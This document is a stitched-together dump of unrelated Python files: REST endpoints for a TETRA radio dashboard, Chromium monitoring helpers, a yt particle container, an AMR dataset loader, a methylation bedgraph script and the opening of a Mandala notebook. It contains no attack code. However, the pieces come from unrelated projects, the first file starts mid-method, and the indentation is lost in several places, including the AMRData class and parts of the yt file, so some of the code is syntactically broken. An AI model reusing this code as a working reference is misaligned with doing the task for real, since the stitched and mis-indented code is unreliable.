        """Aggregate the pre-computed dashboard documents into one response."""
        db = self.DB
        radio_count = db['tetra_radio_count'].find_one({'node': 'all'})
        group_calls = db['tetra_call_stats'].find_one({'type': 'group'})
        individual_calls = db['tetra_call_stats'].find_one({'type': 'individual'})
        sds_calls = db['tetra_call_stats'].find_one({'type': 'sds'})
        node_load = db['tetra_node_load'].find_one({'type': 'bar'})
        sub_load = db['tetra_node_subscribers'].find_one({'type': 'bar'})

        # Same live-replication summary as the tetra_replication endpoint.
        cursor = db['tetra_replication'].find({"type": 'live'})
        try:
            live = list(cursor)[0]
            lag = datetime.timedelta(seconds=live['Seconds_Behind_Master'])
            live['replication_date'] = (live['datetime'] - lag).isoformat()
            live['datetime'] = live['datetime'].isoformat()
        except IndexError:
            live = {
                'replication_date': datetime.datetime.now().isoformat(),
                'datetime': datetime.datetime.now().isoformat(),
            }

        overview = {
            'tetra_radio_count': radio_count,
            'tetra_group_calls': group_calls,
            'tetra_individual_calls': individual_calls,
            'tetra_sds_calls': sds_calls,
            'tetra_node_load': node_load,
            'tetra_sub_load': sub_load,
            'tetra_replication': live,
        }
        return jsonify(json.loads(dumps(overview)))
class tetra_calls_group(Resource):
    '''
    Get tetra group calls in range
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, params):
        """Return group calls between start and end (delegates to calls_group.get)."""
        parser = reqparse.RequestParser()
        for field in ("start", "end"):
            parser.add_argument(field)
        args = parser.parse_args()
        result = calls_group.get(args, self.env)
        return jsonify(json.loads(dumps(result)))
class tetra_calls_subscriber(Resource):
    '''
    Get tetra subscriber calls in range
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, params):
        """Return one subscriber's calls between start and end (delegates to calls_subscriber.get)."""
        parser = reqparse.RequestParser()
        for field in ("issi", "start", "end"):
            parser.add_argument(field)
        args = parser.parse_args()
        result = calls_subscriber.get(args, self.env)
        return jsonify(json.loads(dumps(result)))
class tetra_calls_detail(Resource):
    '''
    Get the detail record of a single tetra call by id
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, params):
        """Return the detail of one call (delegates to calls_detail.get)."""
        parser = reqparse.RequestParser()
        parser.add_argument("id")
        args = parser.parse_args()
        result = calls_detail.get(args, self.env)
        return jsonify(json.loads(dumps(result)))
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper classes that make it easier to instrument code for monitoring."""
from infra_libs.ts_mon.common import metrics
import time
class ScopedIncrementCounter(object):
    """Increment a counter once when the wrapped code exits.

    On exit the counter is incremented with one label (default 'status')
    whose value is 'success' or 'failure' depending on whether the wrapped
    code raised.  A custom value set via set_status()/set_failure() inside
    the block takes precedence and is never overwritten.

    Example:
      mycounter = Counter('foo/stuff_done')
      with ScopedIncrementCounter(mycounter):
        DoStuff()

      with ScopedIncrementCounter(mycounter, 'response_code') as sc:
        sc.set_status(MakeHttpRequest())
    """

    def __init__(self, counter, label='status', success_value='success',
                 failure_value='failure'):
        self.counter = counter
        self.label = label
        self.success_value = success_value
        self.failure_value = failure_value
        self.status = None

    def set_status(self, status):
        """Pin a custom status value; exit will not overwrite it."""
        self.status = status

    def set_failure(self):
        """Shorthand for set_status(failure_value)."""
        self.set_status(self.failure_value)

    def __enter__(self):
        self.status = None
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Derive the status from the exception outcome unless already pinned.
        if self.status is None:
            self.status = self.success_value if exc_type is None else self.failure_value
        self.counter.increment({self.label: self.status})
class ScopedMeasureTime(object):
    """Report durations metric with status when the wrapped code exits.

    The metric must be CumulativeDistributionMetric with a field to set status.
    The status field will be set to 'success' or 'failure' depending on whether
    the wrapped code threw an exception. The status field values can be customized
    with constructor kwargs or by calling `set_status`.

    A new instance of this class should be constructed each time it is used.

    Example:
      mymetric = CumulativeDistributionMetric(
          'xxx/durations', 'duration of xxx op'
          [StringField('status')],
          bucketer=ts_mon.GeometricBucketer(10**0.04),
          units=ts_mon.MetricsDataUnits.SECONDS)
      with ScopedMeasureTime(mymetric):
        DoStuff()

    To set a custom label and status value:
      mymetric = CumulativeDistributionMetric(
          'xxx/durations', 'duration of xxx op'
          [IntegerField('response_code')],
          bucketer=ts_mon.GeometricBucketer(10**0.04),
          units=ts_mon.MetricsDataUnits.MILLISECONDS)
      with ScopedMeasureTime(mymetric, field='response_code') as sd:
        sd.set_status(404)  # This custom status now won't be overwritten
                            # even if exception is raised later.

    To annotate the duration with some other fields, use extra_fields_values:
      mymetric = CumulativeDistributionMetric(
          'xxx/durations', 'duration of xxx op'
          [StringField('status'),
           StringField('type')],
          bucketer=ts_mon.GeometricBucketer(10**0.04),
          units=ts_mon.MetricsDataUnits.SECONDS)
      with ScopedMeasureTime(mymetric, extra_fields_values={'type': 'normal'}):
        DoStuff()
    """

    # Conversion factors from seconds (what time.time yields) to the
    # metric's declared time unit.
    _UNITS_PER_SECOND = {
        metrics.MetricsDataUnits.SECONDS: 1e0,
        metrics.MetricsDataUnits.MILLISECONDS: 1e3,
        metrics.MetricsDataUnits.MICROSECONDS: 1e6,
        metrics.MetricsDataUnits.NANOSECONDS: 1e9,
    }

    def __init__(self, metric, field='status', success_value='success',
                 failure_value='failure', extra_fields_values=(),
                 time_fn=time.time):
        # The metric must be a duration distribution with a known time unit,
        # and `field` must name exactly one of its declared fields.
        assert isinstance(metric, metrics.CumulativeDistributionMetric)
        assert sum(1 for spec in metric.field_spec if spec.name == field) == 1, (
            'typo in field name `%s`?' % field)
        assert metric.units in self._UNITS_PER_SECOND, (
            'metric\'s units (%s) is not one of %s' %
            (metric.units, list(self._UNITS_PER_SECOND.keys())))
        self._metric = metric
        self._field_values = dict(extra_fields_values)
        # The status field must not collide with an extra field value.
        assert field not in self._field_values
        self._field_values[field] = None  # filled on exit unless set_status ran
        self._field = field
        self._units_per_second = self._UNITS_PER_SECOND[metric.units]
        self._success_value = success_value
        self._failure_value = failure_value
        self._start_timestamp = None  # also serves as the "inside with" flag
        self._time_fn = time_fn

    def set_status(self, status):
        """Pin a custom status value; __exit__ will not overwrite it."""
        assert self._start_timestamp is not None, (
            'set_status must be called only inside with statement')
        self._field_values[self._field] = status

    def set_failure(self):
        """Shorthand for set_status(failure_value)."""
        return self.set_status(self._failure_value)

    def __enter__(self):
        assert self._start_timestamp is None, ('re-use of ScopedMeasureTime '
                                               'instances detected')
        self._start_timestamp = self._time_fn()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        elapsed_seconds = self._time_fn() - self._start_timestamp
        # Default the status from the exception outcome unless it was pinned.
        if self._field_values[self._field] is None:
            if exc_type is None:
                self._field_values[self._field] = self._success_value
            else:
                self._field_values[self._field] = self._failure_value
        self._metric.add(elapsed_seconds * self._units_per_second,
                         self._field_values)
|
<filename>yt/data_objects/index_subobjects/particle_container.py
import contextlib
from more_itertools import always_iterable
from yt.data_objects.data_containers import YTFieldData
from yt.data_objects.selection_objects.data_selection_objects import (
YTSelectionContainer,
)
from yt.utilities.exceptions import (
YTDataSelectorNotImplemented,
YTNonIndexedDataContainer,
)
def _non_indexed(name):
def _func_non_indexed(self, *args, **kwargs):
raise YTNonIndexedDataContainer(self)
return _func_non_indexed
class ParticleContainer(YTSelectionContainer):
    """Non-spatial selection container over a set of particle data files.

    Wraps a base selection region plus the data files (and overlapping
    files) it touches.  All index-dependent operations are disabled via
    ``_non_indexed`` stubs.
    """

    _spatial = False
    _type_name = "particle_container"
    _skip_add = True
    _con_args = ("base_region", "data_files", "overlap_files")

    def __init__(self, base_region, data_files, overlap_files=None, domain_id=-1):
        if overlap_files is None:
            overlap_files = []
        self.field_data = YTFieldData()
        self.field_parameters = {}
        self.data_files = list(always_iterable(data_files))
        self.overlap_files = list(always_iterable(overlap_files))
        self.ds = self.data_files[0].ds
        self._last_mask = None
        self._last_selector_id = None
        self._current_particle_type = "all"
        # self._current_fluid_type = self.ds.default_fluid_type
        # Accept either another container-like object (with base_selector)
        # or a plain selectable region.
        if hasattr(base_region, "base_selector"):
            self.base_selector = base_region.base_selector
            self.base_region = base_region.base_region
        else:
            self.base_region = base_region
            self.base_selector = base_region.selector
        self._octree = None
        self._temp_spatial = False
        if isinstance(base_region, ParticleContainer):
            self._temp_spatial = base_region._temp_spatial
            self._octree = base_region._octree
        # To ensure there are not domains if global octree not used
        # (note: the domain_id argument is intentionally ignored here).
        self.domain_id = -1

    @property
    def selector(self):
        # BUG FIX: the original raised using `self.oc_type_name`, an
        # attribute that does not exist (AttributeError would mask the
        # intended exception); `_type_name` is the intended identifier.
        raise YTDataSelectorNotImplemented(self._type_name)

    def select_particles(self, selector, x, y, z):
        """Return the selection mask for particle positions x/y/z."""
        mask = selector.select_points(x, y, z)
        return mask

    @contextlib.contextmanager
    def _expand_data_files(self):
        """Temporarily fold overlap_files into data_files (sorted, deduped)."""
        old_data_files = self.data_files
        old_overlap_files = self.overlap_files
        self.data_files = list(set(self.data_files + self.overlap_files))
        self.data_files.sort()
        self.overlap_files = []
        yield self
        self.data_files = old_data_files
        self.overlap_files = old_overlap_files

    def retrieve_ghost_zones(self, ngz, coarse_ghosts=False):
        """Return a new ParticleContainer wrapping ngz ghost zones."""
        gz_oct = self.octree.retrieve_ghost_zones(ngz, coarse_ghosts=coarse_ghosts)
        # BUG FIX: the original also passed `selector_mask=...`, which
        # __init__ does not accept and which raised a TypeError on every
        # call.  Only the supported constructor arguments are forwarded.
        gz = ParticleContainer(
            gz_oct.base_region,
            gz_oct.data_files,
            overlap_files=gz_oct.overlap_files,
            domain_id=gz_oct.domain_id,
        )
        gz._octree = gz_oct
        return gz

    # Index-dependent operations are unavailable on particle containers.
    select_blocks = _non_indexed("select_blocks")
    deposit = _non_indexed("deposit")
    smooth = _non_indexed("smooth")
    select_icoords = _non_indexed("select_icoords")
    select_fcoords = _non_indexed("select_fcoords")
    select_fwidth = _non_indexed("select_fwidth")
    select_ires = _non_indexed("select_ires")
    select = _non_indexed("select")
    count = _non_indexed("count")
    count_particles = _non_indexed("count_particles")
|
<filename>dataamr.py
from stog.data.dataset_readers.amr_parsing.io import AMRIO
from extra.utils import LongTensor
from extra.settings import PAD_IDX, PAD, OOV, OOV_IDX, BOS, BOS_IDX, \
EOS, EOS_IDX
from tqdm import tqdm
import logging
logger = logging.getLogger(__file__)
def batch_data(amr_data, batch_size=20):
    """Pack the train/dev/test integer sequences into padded LongTensor batches.

    Each batch pads every source (resp. target) sequence with PAD_IDX up to
    the longest sequence in that batch.  A trailing partial batch (fewer than
    batch_size examples) is dropped, matching the original behavior.

    BUG FIX: the original repeated the batching loop three times and never
    reset the shared src/trg accumulators between splits, so a partial batch
    left over from the train split leaked into the first dev batch (and dev
    leftovers into test).  Each split is now batched independently.

    Returns (data_train, data_dev, data_test), each a list of
    (src_tensor, trg_tensor) pairs.
    """
    def _make_batches(sources, targets):
        # Accumulate batch_size (src, trg) pairs, pad them to the batch
        # maximum lengths, then emit a tensor pair.
        batches = []
        src_batch, trg_batch = [], []
        src_batch_len = trg_batch_len = 0
        for src, trg in zip(sources, targets):
            src_batch_len = max(src_batch_len, len(src))
            trg_batch_len = max(trg_batch_len, len(trg))
            src_batch.append(src)
            trg_batch.append(trg)
            if len(src_batch) == batch_size:
                for seq in src_batch:
                    seq.extend([PAD_IDX] * (src_batch_len - len(seq)))
                for seq in trg_batch:
                    seq.extend([PAD_IDX] * (trg_batch_len - len(seq)))
                batches.append((LongTensor(src_batch), LongTensor(trg_batch)))
                src_batch, trg_batch = [], []
                src_batch_len = trg_batch_len = 0
        return batches

    data_train = _make_batches(amr_data.X_train_ints, amr_data.Y_train_ints)
    data_dev = _make_batches(amr_data.X_dev_ints, amr_data.Y_dev_ints)
    data_test = _make_batches(amr_data.X_test_ints, amr_data.Y_test_ints)

    print("Training data size: %d" % (len(data_train) * batch_size))
    print("Training batch size: %d" % batch_size)
    print("Dev data size: %d" % (len(data_dev) * batch_size))
    print("Dev batch size: %d" % batch_size)
    print("Test data size: %d" % (len(data_test) * batch_size))
    print("Test batch size: %d" % batch_size)
    return data_train, data_dev, data_test
class AMRData():
def __init__(self, train_file, dev_file, test_file, silver,
             input_format="raw", use_silver_data=False, small=False):
    """Hold raw/linearized AMR splits plus the token<->int vocabularies."""
    # Global options.
    self.use_silver_data = use_silver_data
    self.input_format = input_format
    self.small = small

    # --- gold training split ---
    self.train_file = train_file
    self.X_train = []
    self.Y_train = []
    self.Y_train_tok = []
    self.X_train_simple = []
    self.X_train_simple_attributes = []
    self.X_train_simple_only_nodes = []
    self.X_train_concepts = []
    self.X_train_ints = []
    self.X_train_raw = []
    self.Y_train_ints = []
    self.amr_train = None

    # --- silver (automatically parsed) training split ---
    self.silver_train_file = silver
    self.X_silver_train = []
    self.Y_silver_train = []
    self.Y_silver_train_tok = []
    self.X_silver_train_simple = []
    self.X_silver_train_simple_attributes = []
    self.X_silver_train_simple_only_nodes = []
    self.X_silver_train_concepts = []
    self.X_silver_train_ints = []
    self.X_silver_train_raw = []
    self.Y_silver_train_ints = []
    self.amr_silver_train = None

    # --- dev split ---
    self.dev_file = dev_file
    self.X_dev = []
    self.Y_dev = []
    self.Y_dev_tok = []
    self.X_dev_simple = []
    self.X_dev_simple_attributes = []
    self.X_dev_simple_only_nodes = []
    self.X_dev_concepts = []
    self.X_dev_ints = []
    self.X_dev_raw = []
    self.Y_dev_ints = []

    # --- test split ---
    self.test_file = test_file
    self.X_test = []
    self.Y_test = []
    self.Y_test_tok = []
    self.X_test_simple = []
    self.X_test_simple_attributes = []
    self.X_test_simple_only_nodes = []
    self.X_test_ints = []
    self.X_test_raw = []
    self.Y_test_ints = []

    # Edge labels observed during linearization.
    self.edges = []
    self.edges_w_attributes = []

    # Linearized-graph vocabulary, seeded with the special symbols.
    self.lin_to_int = {PAD: PAD_IDX, BOS: BOS_IDX, EOS: EOS_IDX, OOV: OOV_IDX}
    self.int_to_lin = {PAD_IDX: PAD, BOS_IDX: BOS, EOS_IDX: EOS, OOV_IDX: OOV}
    # Sentence-side vocabulary, same special symbols.
    self.word_to_int = {PAD: PAD_IDX, BOS: BOS_IDX, EOS: EOS_IDX, OOV: OOV_IDX}
    self.int_to_word = {PAD_IDX: PAD, BOS_IDX: BOS, EOS_IDX: EOS, OOV_IDX: OOV}
def get_list(self, amr):
    """Linearize *amr*'s graph into a flat [":edge", node, ...] token list.

    Node attributes are appended as ":name value" pairs unless the input
    format is "linearized_simple".  Returns None when a node cannot be
    rendered.
    """
    with_attributes = self.input_format != "linearized_simple"
    dfs_list = amr.graph.get_list_node()
    out_list = []
    for n1, t, n2 in dfs_list:
        try:
            out_list += [":" + t, n1.__repr__()]
        except Exception:
            # A malformed node makes the whole graph unusable.
            # (Narrowed from BaseException so KeyboardInterrupt/SystemExit
            # are no longer swallowed.)
            return None
        # If the node has attributes, iterate through them and add them to
        # the list.  The first entry is intentionally skipped (original
        # behavior).
        if with_attributes:
            if len(n1.attributes) > 1:
                for attr in n1.attributes[1:]:
                    # BUG FIX: the original tested `type(attr[1]) != str()`,
                    # comparing a type object against an empty string —
                    # always true.  The intent is to stringify non-str
                    # attribute values.
                    if not isinstance(attr[1], str):
                        attr_tmp = str(attr[1])
                    else:
                        attr_tmp = attr[1]
                    # Attach to final list
                    out_list += [":" + attr[0], attr_tmp]
    return out_list
# Remove not needed symbols
def simplify(self, step):
    """Strip AMR markup from one token; return (token, is_edge).

    Edge labels (starting with ':') pass through untouched.  Other tokens
    lose spaces and quotes, underscores become spaces, the variable prefix
    before '/' is dropped, and sense suffixes after '-' are removed
    (except for the bare '-' token itself).
    """
    if step.startswith(":"):
        return step, True
    cleaned = step.replace(" ", "").replace('"', "").replace("_", " ")
    if "/" in cleaned:
        cleaned = cleaned.split("/")[1]
    if cleaned != '-':
        cleaned = cleaned.split("-")[0]
    return cleaned, False
# Main loading method
    def load_data(self):
        """Read, linearize and simplify the train/silver/dev/test AMR corpora.

        Populates, per split: raw AMR strings (X_*_raw), linearized token
        lists (X_*), simplified variants (X_*_simple, X_*_simple_only_nodes)
        and target sentences / token strings (Y_*, Y_*_tok).  The train and
        silver splits additionally grow the linearization and word
        vocabularies (lin_to_int / word_to_int); dev/test only extend the
        shared edge inventory, so their unseen tokens become OOV later.
        """
        logger.info("Parsing and linearizing the AMR dataset")
        train_amr = AMRIO.read(self.train_file)
        for i, amr in tqdm(enumerate(train_amr), desc='Train AMR'):
            # Raw version
            # In debug mode ("small"), keep only the first ~50 graphs.
            if self.small and i > 50:
                break
            raw_amr = []
            for amr_line in str(amr.graph).splitlines():
                striped_amr = amr_line.strip()
                raw_amr.append(striped_amr)
            self.X_train_raw.append(" ".join(raw_amr))
            linearized_amr = self.get_list(amr)
            # [1:] drops the first token of the linearization.
            self.X_train.append(linearized_amr[1:])
            self.Y_train.append(amr.sentence)
            self.Y_train_tok.append(amr.tokens)
            # Vocabulary Create dictionaries and simplify list
            simpl = list()
            simpl_only_nodes = list()
            for step in linearized_amr:
                if step not in self.lin_to_int.keys():
                    self.lin_to_int[step] = len(self.lin_to_int)
                    self.int_to_lin[len(self.int_to_lin)] = step
                # simplified AMR version
                step, edge = self.simplify(step)
                simpl.append(step)
                if not step.startswith(":"):
                    simpl_only_nodes.append(step)
                # Identify edges and save them
                if edge and step not in self.edges:
                    self.edges.append(step)
            self.X_train_simple.append(simpl)
            self.X_train_simple_only_nodes.append(simpl_only_nodes)
            # Grow the word vocabulary from the gold sentence.
            sent = amr.sentence.split()
            for word in sent:
                if word not in self.word_to_int.keys():
                    self.word_to_int[word] = len(self.word_to_int)
                    self.int_to_word[len(self.int_to_word)] = word
        if self.use_silver_data:
            print("Processing silver data from", self.silver_train_file)
            ii = 0
            silver_train_amr = AMRIO.read(self.silver_train_file)
            for i, amr in enumerate(silver_train_amr):
                if self.small and i > 50:
                    break
                # Raw version
                raw_amr = []
                ii += 1
                linearized_amr = self.get_list(amr)
                # Silver graphs can be malformed; get_list returns None for
                # those and the graph is skipped entirely.
                if linearized_amr is None:
                    continue
                for amr_line in str(amr.graph).splitlines():
                    striped_amr = amr_line.strip()
                    raw_amr.append(striped_amr)
                self.X_silver_train_raw.append(" ".join(raw_amr))
                self.X_silver_train.append(linearized_amr[1:])
                self.Y_silver_train.append(amr.sentence)
                self.Y_silver_train_tok.append(amr.tokens)
                # Vocabulary Create dictionaries and simplify list
                simpl = list()
                simpl_only_nodes = list()
                for step in linearized_amr:
                    if step not in self.lin_to_int.keys():
                        self.lin_to_int[step] = len(self.lin_to_int)
                        self.int_to_lin[len(self.int_to_lin)] = step
                    # simplified AMR version
                    step, edge = self.simplify(step)
                    simpl.append(step)
                    if not step.startswith(":"):
                        simpl_only_nodes.append(step)
                    # Identify edges and save them
                    if edge and step not in self.edges:
                        self.edges.append(step)
                self.X_silver_train_simple.append(simpl)
                self.X_silver_train_simple_only_nodes.append(simpl_only_nodes)
                sent = amr.sentence.split()
                for word in sent:
                    if word not in self.word_to_int.keys():
                        self.word_to_int[word] = len(self.word_to_int)
                        self.int_to_word[len(self.int_to_word)] = word
            print("Silver data with size:", len(self.X_silver_train_raw))
        else:
            print("No silver data performed")
        # Dev/test: same linearization, but vocabularies are NOT extended.
        dev_amr = AMRIO.read(self.dev_file)
        for i, amr in tqdm(enumerate(dev_amr), desc='Dev AMR'):
            if self.small and i > 50:
                break
            # Raw input
            raw_amr = []
            for amr_line in str(amr.graph).splitlines():
                striped_amr = amr_line.strip()
                raw_amr.append(striped_amr)
            self.X_dev_raw.append(" ".join(raw_amr))
            linearized_amr = self.get_list(amr)
            self.X_dev.append(linearized_amr[1:])
            self.Y_dev.append(amr.sentence)
            self.Y_dev_tok.append(amr.tokens)
            # simplified AMR version
            simpl = list()
            simpl_only_nodes = list()
            for step in linearized_amr:
                step, edge = self.simplify(step)
                simpl.append(step)
                if not step.startswith(":"):
                    simpl_only_nodes.append(step)
                if edge and step not in self.edges:
                    self.edges.append(step)
            self.X_dev_simple.append(simpl)
            self.X_dev_simple_only_nodes.append(simpl_only_nodes)
        test_amr = AMRIO.read(self.test_file)
        # Keep the parsed test AMRs around for later use.
        self.amr_test = test_amr
        for i, amr in tqdm(enumerate(test_amr), desc='Test AMR'):
            if self.small and i > 50:
                break
            # Raw version
            raw_amr = []
            for amr_line in str(amr.graph).splitlines():
                striped_amr = amr_line.strip()
                raw_amr.append(striped_amr)
            self.X_test_raw.append(" ".join(raw_amr))
            linearized_amr = self.get_list(amr)
            self.X_test.append(linearized_amr[1:])
            self.Y_test.append(amr.sentence)
            self.Y_test_tok.append(amr.tokens)
            # simplified AMR version
            simpl = list()
            simpl_only_nodes = list()
            for step in linearized_amr:
                step, edge = self.simplify(step)
                simpl.append(step)
                if not step.startswith(":"):
                    simpl_only_nodes.append(step)
                if edge and step not in self.edges:
                    self.edges.append(step)
            self.X_test_simple.append(simpl)
            self.X_test_simple_only_nodes.append(simpl_only_nodes)
def output_data(self, output_src_file, output_trg_file):
print("Write linearized AMRs to file")
F_train_src = open(output_src_file+".train", "w")
F_train_raw_src = open(output_src_file+".amr.train", "w")
F_train_trg = open(output_trg_file+".train", "w")
F_train_tok_trg = open(output_trg_file+".tok.train", "w")
F_dev_src = open(output_src_file+".dev", "w")
F_dev_raw_src = open(output_src_file+".amr.dev", "w")
F_dev_trg = open(output_trg_file+".dev", "w")
F_dev_tok_trg = open(output_trg_file+".tok.dev", "w")
F_test_src = open(output_src_file+".test", "w")
F_test_raw_src = open(output_src_file+".amr.test", "w")
F_test_trg = open(output_trg_file+".test", "w")
F_test_tok_trg = open(output_trg_file+".tok.test", "w")
print(
"TRAIN: src lin:", len(
self.X_train), "src amr", len(
self.X_train_raw), "trg text", len(
self.Y_train_tok), "trg tok", len(
self.Y_train_tok))
for x, x_raw, y, y_tok in zip(
self.X_train, self.X_train_raw, self.Y_train, self.Y_train_tok):
print(" ".join(x), file=F_train_src)
print(y_tok, file=F_train_trg)
print(x_raw, file=F_train_raw_src)
print(y_tok, file=F_train_tok_trg)
print(
"dev: src lin:", len(
self.X_dev), "src amr", len(
self.X_dev_raw), "trg text", len(
self.Y_dev), "trg tok", len(
self.Y_dev_tok))
for x, x_raw, y, y_tok in zip(
self.X_dev, self.X_dev_raw, self.Y_dev, self.Y_dev_tok):
print(" ".join(x), file=F_dev_src)
print(y_tok, file=F_dev_trg)
print(x_raw, file=F_dev_raw_src)
print(y_tok, file=F_dev_tok_trg)
print(
"test: src lin:", len(
self.X_test), "src amr", len(
self.X_test_raw), "trg text", len(
self.Y_test), "trg tok", len(
self.Y_test_tok))
for x, x_raw, y, y_tok in zip(
self.X_test, self.X_test_raw, self.Y_test, self.Y_test_tok):
print(" ".join(x), file=F_test_src)
print(y_tok, file=F_test_trg)
print(x_raw, file=F_test_raw_src)
print(y_tok, file=F_test_tok_trg)
F_train_src.close()
F_train_trg.close()
F_train_raw_src.close()
F_train_tok_trg.close()
F_dev_src.close()
F_dev_trg.close()
F_dev_raw_src.close()
F_dev_tok_trg.close()
F_test_src.close()
F_test_trg.close()
F_test_raw_src.close()
F_test_tok_trg.close()
def to_ints(self):
print("Transform to ints")
pbar = tqdm(total=len(self.X_train)+len(self.X_dev)+len(self.X_test))
for x, y in zip(self.X_train, self.Y_train):
self.X_train_ints.append([self.lin_to_int[x_i]
for x_i in x] + [EOS_IDX])
self.Y_train_ints.append([self.word_to_int[y_i]
for y_i in y.split()] + [EOS_IDX])
pbar.update(1)
for x, y in zip(self.X_dev, self.Y_dev):
x_in = list()
y_in = list()
for x_i in x:
if x_i not in self.lin_to_int.keys():
x_in.append(self.lin_to_int[OOV])
else:
x_in.append(self.lin_to_int[x_i])
for y_i in y:
if y_i not in self.word_to_int.keys():
y_in.append(self.word_to_int[OOV])
else:
y_in.append(self.word_to_int[y_i])
self.Y_dev_ints.append(y_in + [EOS_IDX])
self.X_dev_ints.append(x_in + [EOS_IDX])
pbar.update(1)
for x, y in zip(self.X_test, self.Y_test):
x_in = list()
y_in = list()
for x_i in x:
if x_i not in self.lin_to_int.keys():
x_in.append(self.lin_to_int[OOV])
else:
x_in.append(self.lin_to_int[x_i])
for y_i in y:
if y_i not in self.word_to_int.keys():
y_in.append(self.word_to_int[OOV])
else:
y_in.append(self.word_to_int[y_i])
self.Y_test_ints.append(y_in + [EOS_IDX])
self.X_test_ints.append(x_in + [EOS_IDX])
pbar.update(1)
pbar.close()
|
<reponame>methylgrammarlab/proj_scwgbs
import argparse
import os
import sys
import warnings
import numpy as np
import pandas as pd
from tqdm import tqdm
import time
warnings.simplefilter(action='ignore', category=FutureWarning)
sys.path.append(os.path.dirname(os.getcwd()))
sys.path.append(os.getcwd())
from commons import files_tools
import commons.consts as consts
def parse_input():
    """Parse this script's command-line arguments.

    :return: argparse.Namespace with methylation_folder, QC_path and
        output_folder (defaults to the script's directory) attributes.
    """
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--methylation_folder', help='Path to methylation files', required=True)
    arg_parser.add_argument('--QC_path', help='Path to QC file', required=True)
    arg_parser.add_argument('--output_folder', help='Path of the output folder', required=False,
                            default=os.path.dirname(sys.argv[0]))
    return arg_parser.parse_args()
def get_patient_df_dict(all_file_paths):
    """
    Load every methylation DF and group them by patient.

    :param all_file_paths: List of all the methylation files
    :return: A dictionary where the keys are the patients and the values are
        dictionaries mapping chromosome -> methylation df
    """
    patient_df_dict = {}
    for file_path in tqdm(all_file_paths):
        # File name encodes both the patient and the chromosome.
        patient, chromosome = consts.DATA_FILE_SCWGBS_RE.findall(file_path)[0]
        per_chromosome = patient_df_dict.setdefault(patient, {})
        per_chromosome[chromosome] = pd.read_pickle(file_path)
    return patient_df_dict
def get_QC(QC_path):
    """Read the QC csv and return, per patient, the Series of its "X" column.

    :param QC_path: path to a csv with at least `patient` and `X` columns
    :return: dict patient -> pandas Series of that patient's "X" values
    """
    qc_df = pd.read_csv(QC_path)
    qc_dict = {}
    for patient in qc_df.patient.unique():
        qc_dict[patient] = qc_df.loc[qc_df.patient == patient, "X"]
    return qc_dict
def combine_df(df_list):
    """Concatenate a list of per-chromosome DataFrames into one frame."""
    return pd.concat(df_list)
def save_to_file(patient, all_patient_chr, out_path):
    """Write the merged per-patient table as a gzipped tab-separated bedgraph.

    :param patient: patient identifier (goes into the file name)
    :param all_patient_chr: combined DataFrame for all chromosomes
    :param out_path: output directory
    """
    out_file = os.path.join(out_path,
                            "filtered_cpg_ratios_%s_hg19.bedgraph.gz" % patient)
    all_patient_chr.to_csv(out_file, compression='gzip', sep='\t', index=False)
def create_bed(patients_dict, passed_QC, out_path):
    """For every patient: filter by QC, merge chromosomes, write a bedgraph.

    :param patients_dict: patient -> {chromosome -> methylation df}
    :param passed_QC: patient -> QC-passing cell labels
    :param out_path: output directory for the bedgraph files
    """
    for patient in tqdm(patients_dict):
        per_chromosome_frames = create_df_list(patients_dict[patient],
                                               passed_QC[patient])
        merged = combine_df(per_chromosome_frames)
        save_to_file(patient, merged, out_path)
def create_df_list(patient_dict, passed_QC):
    """Build one bed-style DataFrame per chromosome for a single patient.

    :param patient_dict: dict chromosome -> methylation DataFrame; rows are
        indexed by cell labels (filtered against passed_QC) and columns are
        CpG positions -- presumably; verify against the upstream pickles
    :param passed_QC: labels (list/Series) of cells that passed QC
    :return: list of transposed DataFrames with chr/start/end bed columns
    """
    patient_list = []
    for chromosome in patient_dict:  # renamed from `chr` (shadowed builtin)
        chromosome_df = patient_dict[chromosome]
        # filter to QC-passing rows.  BUGFIX: `index & passed_QC` relied on
        # the deprecated set-like Index.__and__ (changed/removed in pandas
        # 2.0); Index.intersection is the supported equivalent.
        filtered_df = chromosome_df.loc[chromosome_df.index.intersection(passed_QC), :]
        # transpose so rows become the position axis
        transposed_df = filtered_df.T
        # add bed columns: chr, start, end (end = start + 1)
        transposed_df.insert(0, 'chr', chromosome)
        transposed_df.insert(1, 'start', transposed_df.index.astype(int))
        transposed_df.insert(2, 'end', transposed_df.start + 1)
        patient_list.append(transposed_df)
    return patient_list
def main():
    """Entry point: load QC lists and methylation files, write bedgraphs."""
    args = parse_input()
    # per-patient labels of cells that passed QC
    passed_QC = get_QC(args.QC_path)
    # every per-chromosome methylation pickle under the input folder
    all_files = files_tools.get_files_to_work(args.methylation_folder, pattern=os.path.join("*", "*.pkl.zip"))
    patients_dict = get_patient_df_dict(all_files)
    create_bed(patients_dict, passed_QC, args.output_folder)
if __name__ == '__main__':
    # Time the whole run and report it at the end.
    t0 = time.time()
    main()
    t1 = time.time()
    print("total time:", t1 - t0)
|
<reponame>amakelov/mandala
#!/usr/bin/env python
# coding: utf-8
# # Mandala: self-managing experiments
# ## What is Mandala?
# Mandala enables new, simpler patterns for working with complex and evolving
# computational experiments.
#
# It eliminates low-level code and decisions for how to save, load, query,
# delete and otherwise organize results. To achieve this, it lets computational
# code "manage itself" by organizing and addressing its own data storage.
#
# ```{admonition} Under construction
# :class: warning
# This project is under active development
# ```
#
# ### Features at a glance
# - **concise**: code computations in pure Python (w/ control flow, collections,
# ...) -- results are automatically tracked and queriable
# - **iterate rapidly**: add/edit parameters/logic and rerun code -- past results
# are loaded on demand, and only new computations are executed
# - **pattern-match against Python code**: query across complex, branching
# projects by reusing computational code itself
# ### Quick start
# #### Installation
# ```console
# pip install git+https://github.com/amakelov/mandala
# ```
# #### Recommended introductions
# To build some understanding, check these out:
# - 2-minute introduction: [intro to self-managing code](2mins)
# - 10-minute introduction: [manage a small ML project](10mins)
# #### Minimal working examples
# If you want to jump right into code, below are a few minimal, somewhat
# interesting examples to play with and extend:
# In[1]:
from typing import List
from mandala.all import *
# keep mandala's own log output quiet for this demo
set_logging_level('warning')
